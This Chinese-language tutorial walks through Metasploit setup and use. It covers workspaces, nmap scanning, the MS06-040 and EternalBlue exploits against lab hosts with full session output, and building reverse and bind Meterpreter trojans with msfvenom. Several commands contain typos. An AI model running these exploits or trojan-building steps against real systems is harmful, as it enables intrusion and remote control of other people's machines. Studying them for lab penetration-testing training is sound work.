[安全] metasploit(1)
一、配置metasploit环境
1.自定义命令提示符
msf5 > set Prompt my-msf Prompt => my-msf my-msf >
除了指定字符串,还可以使用以下格式:
%D 当前目录 %H 主机名 %J 当前正运行的工作数量 %L 本地IP地址 %S 当前打开的会话数 %T 时间戳(set PromptTimeFormat %Y-%m-%d修改格式) %U 当前使用的用户名称 %W 当前所处的工作区
除了修改命令提示符内容,还可以修改">"为其他符号:
my-msf > set PromptChar $ PromptChar => $ my-msf $
2.开启计时功能
当我们执行任务时,为了了解每一步操作发生的时间,需要具备计时功能。
my-msf $ set TimestampOutput true TimestampOutput => true
true为开启计时功能,false为关闭。
3.开启日志记录
当我们需要对操作进行日志记录时,可以开启日志记录功能(默认是关闭的):
my-msf $ set ConsoleLogging true Console logging is now enabled. ConsoleLogging => true
这样,我们所做的操作都会被记录到 /root/.msf4/logs/console.log 中(从开启日志功能后开始记录)。
4.开启会话日志
第3节中所开启的是console的日志(即运行命令时的记录),而当我们攻击成功后,获得了会话连接,则需要记录连接的日志。
msf5 > set SessionLogging true Session logging will be enabled for future sessions. SessionLogging => true
5.设置日志级别
msf5 > set LogLevel 2 LogLevel => 2
日志级别为0、1、2、3,值越高,内容越详细。
6.模块级别
对于exploit模块,Metasploit根据模块使用容易程度和对目标系统的潜在影响程度,对模块进行了分级。
1951 windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow 1952 windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) 1953 windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow 1954 windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow 1955 windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow 1956 windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow 1957 windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow 1958 windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution 1959 windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite
| 排名 | 对应值 | 含义 |
| Manual | 0 | 难以攻击成功的模块 |
| Low | 100 | 基本不可能成功,成功率低于5% |
| Average | 200 | 一般不会成功 |
| Normal | 300 | 在特定版本中可以被利用成功 |
| Good | 400 | 一般会成功 |
| Great | 500 | 会自动检测到可利用的目标,成功率很高 |
| Excellent | 600 | 不会使服务器崩溃,基本可以放心使用,适用于SQL注入、CMD执行、RFI、LFI等 |
有些模块可能没有被设置级别,如果我们发现其比较好用,可以使用以下命令给其设置一个级别:
set MinimumRank 300 # 先执行use xxx/xxx/xxx
二、MSF基本使用
1.工作区管理
1)查看工作区
msf5 > workspace
* default
2)添加工作区
msf5 > workspace -a work1 [*] Added workspace: work1 [*] Workspace: work1
3)查看工作区详细信息
msf5 > workspace -v Workspaces ========== current name hosts services vulns creds loots notes ------- ---- ----- -------- ----- ----- ----- ----- default 7 4 1 0 0 2 work1 0 0 0 0 0 0 work2 0 0 0 0 0 0 * work3 0 0 0 0 0 0
name:工作区名称。
hosts:工作区记录的主机数。
services:工作区记录的服务数。
vulns:工作区记录的漏洞信息数。
creds:工作区记录的认证信息数。
loots:工作区记录的战利品数。
notes:工作区记录的备注信息数。
4)切换工作区
msf5 > workspace work2
[*] Workspace: work2
5)重命名工作区
msf5 > workspace -r work3 my_work [*] Renamed workspace 'work3' to 'my_work'
6)删除工作区
msf5 > workspace -d my_work [*] Deleted workspace: my_work
删除所有工作区(包含当前的default工作区,删除完后重新创建一个新的default工作区):
msf5 > workspace -D [*] Deleted workspace: default [*] Recreated the default workspace [*] Deleted workspace: work1 [*] Deleted workspace: work2 [*] Switched to workspace: default msf5 > workspace * default
2.确定目标主机
1)使用nmap扫描目标主机
msf5 > db_nmap -sP 192.168.4.0/24 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-24 02:40 EDT [*] Nmap: Nmap scan report for 17WiFi.lan (192.168.4.1) [*] Nmap: Host is up (0.00042s latency). [*] Nmap: MAC Address: 4C:6E:6E:00:EF:E8 (Comnect Technology) [*] Nmap: Nmap scan report for DESKTOP-6MQMP8A.lan (192.168.4.42) [*] Nmap: Host is up (0.0017s latency). [*] Nmap: MAC Address: B4:2E:99:EE:74:35 (Giga-byte Technology) [*] Nmap: Nmap scan report for 192.168.4.52 [*] Nmap: Host is up (0.00012s latency). [*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware) [*] Nmap: Nmap scan report for 192.168.4.199 [*] Nmap: Host is up (0.00016s latency). [*] Nmap: MAC Address: B4:2E:99:EE:73:E0 (Giga-byte Technology) [*] Nmap: Nmap scan report for 192.168.4.210 [*] Nmap: Host is up (0.00014s latency). [*] Nmap: MAC Address: 00:0C:29:7E:61:77 (VMware) [*] Nmap: Nmap scan report for 192.168.4.211 [*] Nmap: Host is up (0.00014s latency). [*] Nmap: MAC Address: 00:0C:29:C8:38:DE (VMware) [*] Nmap: Nmap scan report for parrot.lan (192.168.4.219) [*] Nmap: Host is up (0.028s latency). [*] Nmap: MAC Address: 60:D8:19:C4:C4:32 (Hon Hai Precision Ind.) [*] Nmap: Nmap scan report for kali.lan (192.168.4.146) [*] Nmap: Host is up. [*] Nmap: Nmap done: 256 IP addresses (8 hosts up) scanned in 1.31 seconds
msf5 > workspace -v Workspaces ========== current name hosts services vulns creds loots notes ------- ---- ----- -------- ----- ----- ----- ----- * default 8 0 0 0 0 0
使用db_nmap来调用nmap模块,使用方法和Nmap命令一样。扫描完毕后,可以看到当前工作区中以发现的主机有8台。
2)导入第三方扫描报告
查看支持的报告种类:
msf5 > db_import Usage: db_import <filename> [file2...] Filenames can be globs like *.xml, or **/*.xml which will search recursively Currently supported file types include: Acunetix Amap Log Amap Log -m Appscan Burp Session XML Burp Issue XML CI Foundstone FusionVM XML Group Policy Preferences Credentials IP Address List IP360 ASPL IP360 XML v3 Libpcap Packet Capture Masscan XML Metasploit PWDump Export Metasploit XML Metasploit Zip Export Microsoft Baseline Security Analyzer NeXpose Simple XML NeXpose XML Report Nessus NBE Report Nessus XML (v1) Nessus XML (v2) NetSparker XML Nikto XML Nmap XML OpenVAS Report OpenVAS XML Outpost24 XML Qualys Asset XML Qualys Scan XML Retina XML Spiceworks CSV Export Wapiti XML
导入nmap生成的XML文件:
msf5 > db_import subnet.xml [*] Importing 'Nmap XML' data [*] Import: Parsing with 'Nokogiri v1.10.7' [*] Importing host 192.168.4.1 [*] Importing host 192.168.4.42 [*] Importing host 192.168.4.52 [*] Importing host 192.168.4.199 [*] Importing host 192.168.4.210 [*] Importing host 192.168.4.211 [*] Importing host 192.168.4.146 [*] Successfully imported /root/subnet.xml
3)查看工作区中有哪些主机
msf5 > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.1 4c:6e:6e:00:ef:e8 17WiFi.lan Unknown device 192.168.4.42 b4:2e:99:ee:74:35 DESKTOP-6MQMP8A.lan Unknown device 192.168.4.52 00:0c:29:fa:dd:2a Unknown device 192.168.4.146 kali.lan Unknown device 192.168.4.199 b4:2e:99:ee:73:e0 Unknown device 192.168.4.210 00:0c:29:7e:61:77 Unknown device 192.168.4.211 00:0c:29:c8:38:de Unknown device
4)从导入的报告中分析漏洞
如果我们导入的第三方报告中包含主机的漏洞信息,则可以直接对其进行分析:
msf5 > analyze 192.168.4.211 [*] Analyzing 192.168.4.211... [*] No suggestions for 192.168.4.211.
这里可以看到,我们导入的报告中没有192.168.4.211的漏洞信息。
使用workspace -v可以查看不存在vulns:
msf5 > workspace -v Workspaces ========== current name hosts services vulns creds loots notes ------- ---- ----- -------- ----- ----- ----- ----- * default 7 0 0 0 0 7
假设某个主机在报告中存在漏洞,则使用analyze分析后,metasploit会给出对应漏洞的攻击脚本路径。例如 exploit/windows/smb/ms04_011_lsass 。
3.管理目标主机
针对我们扫描到的目标主机,不是每一个主机都作为渗透攻击的目标,则需要我们对其进行管理。
1)hosts命令
命令格式: hosts [options] [addr1 addr2 ...]
msf5 > hosts -h Usage: hosts [ options ] [addr1 addr2 ...] OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c <col1,col2> Only show the given columns (see list below) -C <col1,col2> Only show the given columns until the next restart (see list below) -h,--help Show this help information -u,--up Only show hosts which are up -o <file> Send output to a file in csv format -O <column> Order rows by specified column number -R,--rhosts Set RHOSTS from the results of the search -S,--search Search string to filter by -i,--info Change the info of a host -n,--name Change the name of a host -m,--comment Change the comment of a host -t,--tag Add or specify a tag to a range of hosts Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
2)hosts显示方式
显示指定的列:
msf5 > hosts -c address,mac Hosts ===== address mac ------- --- 192.168.4.1 4c:6e:6e:00:ef:e8 192.168.4.42 b4:2e:99:ee:74:35 192.168.4.52 00:0c:29:fa:dd:2a 192.168.4.146 192.168.4.199 b4:2e:99:ee:73:e0 192.168.4.210 00:0c:29:7e:61:77 192.168.4.211 00:0c:29:c8:38:de
注意,这里的 -c 如果换成 -C ,则会一直生效,直到重启数据库。
显示up的主机:
msf5 > hosts -u
按某一列进行排序:
msf5 > hosts -O 2 Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.146 kali.lan Unknown device 192.168.4.210 00:0c:29:7e:61:77 Unknown device 192.168.4.211 00:0c:29:c8:38:de Unknown device 192.168.4.52 00:0c:29:fa:dd:2a Unknown device 192.168.4.1 4c:6e:6e:00:ef:e8 17WiFi.lan Unknown device 192.168.4.199 b4:2e:99:ee:73:e0 Unknown device 192.168.4.42 b4:2e:99:ee:74:35 DESKTOP-6MQMP8A.lan Unknown device
可以看到,以上是按第二列mac进行排序。
3)添加tags和info
我们为了标识某个主机,可以为其添加一个tag或info:
msf5 > hosts 192.168.4.199 -t important msf5 > hosts 192.168.4.199 -i info199
msf5 > hosts -c address,info Hosts ===== address info ------- ---- 192.168.4.1 192.168.4.42 192.168.4.52 192.168.4.146 192.168.4.199 info199 192.168.4.210 192.168.4.211
4)修改主机名
msf5 > hosts 192.168.4.1 -n gateway msf5 > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.1 4c:6e:6e:00:ef:e8 gateway Unknown device 192.168.4.42 b4:2e:99:ee:74:35 DESKTOP-6MQMP8A.lan Unknown device 192.168.4.52 00:0c:29:fa:dd:2a Unknown device 192.168.4.146 kali.lan Unknown device 192.168.4.199 b4:2e:99:ee:73:e0 Unknown device info199 192.168.4.210 00:0c:29:7e:61:77 Unknown device 192.168.4.211 00:0c:29:c8:38:de Unknown device
5)搜索主机
msf5 > hosts -S kali Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.146 kali.lan Unknown device
使用-S搜索任意关键字(不区分大小写)。
6)导出主机到文件
msf5 > hosts -o host.csv
[*] Wrote hosts to host.csv
4.管理工作区中其他对象
除了hosts,在工作区中还有services、creds(认证信息)、loots(战利品)、notes(备注)、vulns(漏洞)。基本的管理流程和hosts相似,这里不做赘述。
5.备份数据
前面所述中,我们在管理hosts等信息时,可以使用-o导出csv文件,但只能对部分数据进行备份。如果想要备份整个工作区,则可以使用db_export:
msf5 > db_export -f xml keep.xml [*] Starting export of workspace default to keep.xml [ xml ]... [*] Finished export of workspace default to keep.xml [ xml ]...
可以看到保存的XML格式如下:
三、metasploit简单使用
1.查询漏洞模块
msf5 > show exploits
可以列出当前版本metasploit所有的漏洞利用模块。
1945 windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution 1946 windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow 1947 windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow 1948 windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow 1949 windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow 1950 windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow 1951 windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow 1952 windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) 1953 windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow 1954 windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow 1955 windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow 1956 windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow 1957 windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow 1958 windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution 1959 windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite
2.使用一个漏洞(流程)
msf5 > use exploit/windows/smb/ms06_040_netapi
msf5 exploit(windows/smb/ms06_040_netapi) >
这些漏洞都是按类别分好的, 都存放在相应的目录下,我们只需要use他就可以了。
这些漏洞模块,一般是放在以下目录的:
/usr/share/metasploit-framework/modules/exploits/
例如我们使用的ms04_031_netdde就是在这个目录:
/usr/share/metasploit-framework/modules/exploits/windows/smb
查看漏洞如何使用:
msf5 exploit(windows/smb/ms06_040_netapi) > show info Name: MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow Module: exploit/windows/smb/ms06_040_netapi Platform: Windows Arch: Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good Disclosed: 2006-08-08 Provided by: hdm <x@hdm.io> Module stability: crash-os-restarts crash-service-down Module reliability: unreliable-session Available targets: Id Name -- ---- 0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1) 1 (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4 2 (wcscpy) Windows XP SP0/SP1 3 (stack) Windows XP SP1 English 4 (stack) Windows XP SP1 Italian 5 (wcscpy) Windows 2003 SP0 Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload information: Space: 370 Avoid: 7 characters Description: This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0. References: https://cvedetails.com/cve/CVE-2006-3439/ OSVDB (27845) http://www.securityfocus.com/bid/19409 https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/MS06-040
这里面特别要注意basic options,这是我们要使用这个漏洞,必须设置的一些选项。
选择payload(show payloads):
msf5 exploit(windows/smb/ms06_040_netapi) > show payloads
可以看到很多可用的payloads,选择一个需要的进行设置:
msf5 exploit(windows/smb/ms06_040_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
再对basic options进行设置(参照show info中所需的basic options):
msf5 exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.4.211 RHOSTS => 192.168.4.211
然后执行攻击:
msf5 exploit(windows/smb/ms06_040_netapi) > exploit
使用exploit攻击,或者使用run也可以。
使用back退出该漏洞使用:
msf5 exploit(windows/smb/ms06_040_netapi) > back
msf5 >
3.在漏洞模块下查看help
在某个漏洞使用命令行下使用help会比在msf命令行下使用help,多以下部分内容:
msf5 exploit(windows/smb/ms06_040_netapi) > help Core Commands ============= Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu history Show command history load Load a framework plugin quit Exit the console repeat Repeat a list of commands route Route traffic through a session save Saves the active datastores sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbers Module Commands =============== Command Description ------- ----------- advanced Displays advanced options for one or more modules back Move back from the current context info Displays information about one or more modules loadpath Searches for and loads modules from a path options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack reload_all Reloads all modules from all defined module paths search Searches module names and descriptions show Displays modules of a given type, or all modules use Interact with a module by name or search term/index Job Commands ============ Command Description ------- ----------- handler Start a payload handler as job jobs Displays and manages jobs kill Kill a job rename_job Rename a job Resource Script Commands ======================== Command Description ------- ----------- makerc Save commands entered since start to a file resource Run the commands stored in a file Database Backend Commands ========================= Command Description ------- ----------- analyze Analyze database information about a specific address or address range db_connect Connect to an existing data service db_disconnect Disconnect from the current data service db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache (deprecated) db_remove Remove the saved data service entry db_save Save the current data service connection as the default to reconnect on startup db_status Show the current data service status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces Credentials Backend Commands ============================ Command Description ------- ----------- creds List all credentials in the database Developer Commands ================== Command Description ------- ----------- edit Edit the current module or a file with the preferred editor irb Open an interactive Ruby shell in the current context log Display framework.log paged to the end if possible pry Open the Pry debugger on the current module or Framework reload_lib Reload Ruby library files from specified paths Exploit Commands ================ Command Description ------- ----------- check Check to see if a target is vulnerable exploit Launch an exploit attempt rcheck Reloads the module and checks if the target is vulnerable recheck Alias for rcheck reload Just reloads the module rerun Alias for rexploit rexploit Reloads the module and launches an exploit attempt run Alias for exploit msfconsole ========== `msfconsole` is the primary interface to Metasploit Framework. There is quite a lot that needs go here, please be patient and keep an eye on this space! Building ranges and lists ------------------------- Many commands and options that take a list of things can use ranges to avoid having to manually list each desired thing. All ranges are inclusive. ### Ranges of IDs Commands that take a list of IDs can use ranges to help. Individual IDs must be separated by a `,` (no space allowed) and ranges can be expressed with either `-` or `..`. ### Ranges of IPs There are several ways to specify ranges of IP addresses that can be mixed together. The first way is a list of IPs separated by just a ` ` (ASCII space), with an optional `,`. The next way is two complete IP addresses in the form of `BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR specifications may also be used, however the whole address must be given to Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC. Additionally, a netmask can be used in conjunction with a domain name to dynamically resolve which block to target. All these methods work for both IPv4 and IPv6 addresses. IPv4 addresses can also be specified with special octet ranges from the [NMAP target specification](https://nmap.org/book/man-target-specification.html) ### Examples Terminate the first sessions: sessions -k 1 Stop some extra running jobs: jobs -k 2-6,7,8,11..15 Check a set of IP addresses: check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255 Target a set of IPv6 hosts: set RHOSTS fe80::3990:0000/110, ::1-::f0f0 Target a block from a resolved domain name: set RHOSTS www.example.test/24
注意其中黄色部分的内容是漏洞模块下使用help特有的部分,其余部分内容和在msf命令下使用help是一样的。
4.生成木马后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > shell.exe
使用msfvenom命令来生成一个指定payload的木马程序。
-p是指定payload类型。LHOST是控制端(我们的主机)的IP。LPORT是控制端的端口。
这个木马如果被植入了被攻击的主机,则这个程序会与我们给其指定的IP和端口进行连接,从而让我们通过这个通道来执行我们的远程控制命令。
注意这个payload对应着以下ruby文件:
/usr/share/metasploit-framework/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
5.监听一个端口,等待反弹连接
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set LHOST 192.169.4.146 LHOST => 192.169.4.146 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.4.146:4444
exploit/multi/handler是专门用来监听反弹连接的模块,我们运行它,然后设置LHOST和LPORT,也就是我们给木马设置的连接IP和port,我们需要在本地进行监听,等待木马程序的连接。使用exploit或run开始监听。
四、利用ms17-010漏洞攻击windows server 2008 R2
1.查找漏洞ms17-010
msf5 > search ms17 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/mssql/mssql_enum_domain_accounts normal No Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration 1 auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normal No Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration 2 auxiliary/admin/mssql/mssql_enum_sql_logins normal No Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration 3 auxiliary/admin/mssql/mssql_escalate_execute_as normal No Microsoft SQL Server Escalate EXECUTE AS 4 auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal No Microsoft SQL Server SQLi Escalate Execute AS 5 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 6 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 7 exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 8 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization 9 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 10 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 11 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2.使用漏洞
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >
3.设置靶机IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.4.142 RHOST => 192.168.4.142
4.攻击靶机
msf5 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.4.146:4444 [*] 192.168.4.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.4.142:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit) [*] 192.168.4.142:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.4.142:445 - Connecting to target for exploitation. [+] 192.168.4.142:445 - Connection established for exploitation. [+] 192.168.4.142:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.4.142:445 - CORE raw buffer dump (38 bytes) [*] 192.168.4.142:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.4.142:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente [*] 192.168.4.142:445 - 0x00000020 72 20 37 36 30 30 r 7600 [+] 192.168.4.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.4.142:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.4.142:445 - Sending all but last fragment of exploit packet [*] 192.168.4.142:445 - Starting non-paged pool grooming [+] 192.168.4.142:445 - Sending SMBv2 buffers [+] 192.168.4.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.4.142:445 - Sending final SMBv2 buffers. [*] 192.168.4.142:445 - Sending last fragment of exploit packet! [*] 192.168.4.142:445 - Receiving response from exploit packet [+] 192.168.4.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.4.142:445 - Sending egg to corrupted connection. [*] 192.168.4.142:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (192.168.4.146:4444 -> 192.168.4.142:49159) at 2020-04-20 04:52:13 -0400 [+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= C:\Windows\system32>
可以看到,已经通过该漏洞反弹回windows的cmd了。
5.将会话放到后台
C:\Windows\system32>background Background session 1? [y/N] y msf5 exploit(windows/smb/ms17_010_eternalblue) > msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1 [*] Starting interaction with 1... C:\Windows\system32>
使用background可以将已反弹的会话放到后台,或者使用Ctrl+Z快捷键。
通过sessions -i 1可以将会话返回前台。
我们可以查看所有的会话:
msf5 > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows Microsoft Windows [_ 6.1.7600] _ (c) 2009 Microsoft Corporation_ C:\Windows\s... 192.168.4.146:4444 -> 192.168.4.142:49158 (192.168.4.142)
可以在msf命令行或者use exploits后的命令行中使用sessions查看已存在的会话。并通过sessions -i ID切换到对应的shell。
五、木马渗透1(反向)
1.生成一个木马(反向连接类型)
msfvenmon -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > trojan_backward.exe
利用msfvenom生成一个木马程序叫trojan_backward.exe,其中用到的payload是windows/meterpreter/reverse_tcp,这是一个反向连接方式的payload,LHOST是我们的攻击机的IP地址,LPORT是攻击机的端口(我们需要监听的端口)。
2.在msf中监听连接
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set LHOST 192.168.4.146 LHOST => 192.168.4.146 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.4.146:4444
分别设置本机(攻击机)的IP地址和需要监听的端口(这个端口已经存在于生成的木马中,木马会主动连接这个端口)。
3.将木马拷贝到靶机并运行(暂时关闭防火墙和AV)
在靶机运行木马程序之后,可以看到攻击机监听的4444端口被连接,并且反弹了shell:
[*] Started reverse TCP handler on 192.168.4.146:4444 [*] Sending stage (180291 bytes) to 192.168.4.199 [*] Meterpreter session 1 opened (192.168.4.146:4444 -> 192.168.4.199:9018) at 2020-04-21 05:00:08 -0400 meterpreter >
在这个meterpreter命令行中,使用help查看可用的操作,例如执行ipconfig命令,screenshot命令(截屏)等。
4.使用64位的版本
前面我们默认使用的payload是32bit版本,如果要使用64位,则是windows/x64/meterpreter/reversetcp。
注意:如果生成木马时使用的payload为64位,则在msf中使用exploit/multi/handler后,也要使用一下命令来指定64位的对应payload:
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
然后其他的操作都和32位一样。
总结:版本的问题要保证木马使用的payload要和msf的payload设置对应起来。这个操作适用于所有的payload。
六、木马渗透2(正向)
1.生成一个木马(正向连接类型)
sfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.4.199 LPORT=5555 -f exe > trojan_forward.exe
注意,这里的LHOST和reverse_tcp不一样,这里的是靶机的IP地址,LPORT是靶机监听的端口。
2.在msf中开始主动连接木马
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp payload => windows/x64/meterpreter/bind_tcp msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 5555 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set RHOST 192.168.4.199 RHOST => 192.168.4.199 msf5 exploit(multi/handler) > set LPORT 5555 LPORT => 4444 msf5 exploit(multi/handler) > run [*] Started bind TCP handler against 192.168.4.199:5555
其实也是先使用exploit/multi/handler,然后和反向连接方式不同的是要手工设置一下payload的类型,这里是windows/meterpreter/bind_tcp。
然后设置RHOST为靶机IP地址,LPORT为靶机监听的端口5555,当我们的木马被靶机用户执行后,会监听在5555端口,等待攻击机的msf来连接。
3.在靶机上运行木马
在靶机上运行木马的操作也可以是在msf连接木马之前(不影响效果)。
运行木马后(木马监听靶机的5555端口),在msf这边可以看到连接成功:
[*] Started bind TCP handler against 192.168.4.199:5555 [*] Sending stage (206403 bytes) to 192.168.4.199 [*] Meterpreter session 2 opened (192.168.4.146:41015 -> 192.168.4.199:5555) at 2020-04-21 05:05:42 -0400 meterpreter >
其余的操作都和反向连接方式是一样的。
